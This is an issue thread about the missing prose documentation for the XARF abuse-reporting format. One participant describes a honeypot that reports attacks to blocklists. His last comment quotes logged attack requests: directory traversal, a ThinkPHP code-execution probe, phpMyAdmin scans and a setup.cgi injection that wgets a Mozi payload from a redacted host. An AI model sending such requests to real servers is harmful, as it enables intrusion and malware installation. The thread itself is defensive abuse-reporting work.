Create documentation

[FrederikP]

Currently xarf is mainly documented via the schema itself and description fields. That's not really comfortable to read. I think the most commonly used resource when using xarf right now are the samples.
We should create a detailed documentation clarifying what the fields mean, what is required, etc.

[IByte]

It would indeed be appreciated to have clear documentation in English rather than just in JSON. Besides, apart from readability, "everything you need to know about the protocol" is more than what's on the wire or what can be expressed in JSON (take a look at any random RFC for examples).

(I am considering writing an XARF generator for the intrusion detection system I'm building. Currently, I'm sending the logs of SSH login attacks to Blocklist.de, and have them do the hard work of submitting it as XARF reports, so a lot of thanks to them.)

[tknecht]

Hi IByte,

just wanted to let you know about news from today:
https://abusix.com/resources/blocklists/abusix-to-take-over-the-operation-of-blocklist-de/ since you mentioned blocklist.de in your question.

If you want, please reach out to us directly and we will be happy to work with you and get you into an early adopter stage for the new things we are planning to do with blocklist.de.
Thanks!

[IByte]

Hello Tobias,

Yes, I am interested in seeing new features on blocklist.de to make abuse reporting more convenient.

I should note that I am a home (i.e. not corporate) user, albeit with a computer science degree.

The advantage of being the only legitimate user of my server from an abuse detection point of view is that it greatly simplifies telling the good traffic from the bad.

The intrusion detection software I'm working on focuses mainly on web traffic, essentially turning it into a honeypot for any web application that isn't actually installed (which is most things), and sends reports about it to IP blocklists. It also incorporates the SSH bans database from fail2ban and sends these to blocklist.de.

While I'm on the subject, is there a XARF reporting type for these types of web-based abuse, e.g. directory traversal attempts, remote code execution and/or trying to download shellcode or trying 251 different ways of saying "phpMyAdmin" to see whether it is on the server? A few examples of the things I'd like to report (edited for brevity):

GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1
GET /index.php?function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
GET /setup.cgi?cmd=wget+http://some.ip:51486/Mozi.m HTTP/1.0
GET /mysql/sqlmanager/index.php HTTP/1.1
GET /pma2011/index.php HTTP/1.1

To expand on that subject and return to the original topic of this issue, although I found fail2ban's sample implementation of XARF reporting at https://github.com/fail2ban/fail2ban/blob/master/config/action.d/xarf-login-attack.conf rather informative, as I said earlier, both that and the contents of this repository focus largely on syntax and not so much on semantics, or in plain English, what does it actually mean? When are you supposed to use what kind of reporting type, for instance? The schema files currently don't offer a lot more than a repetition of the type name on that subject.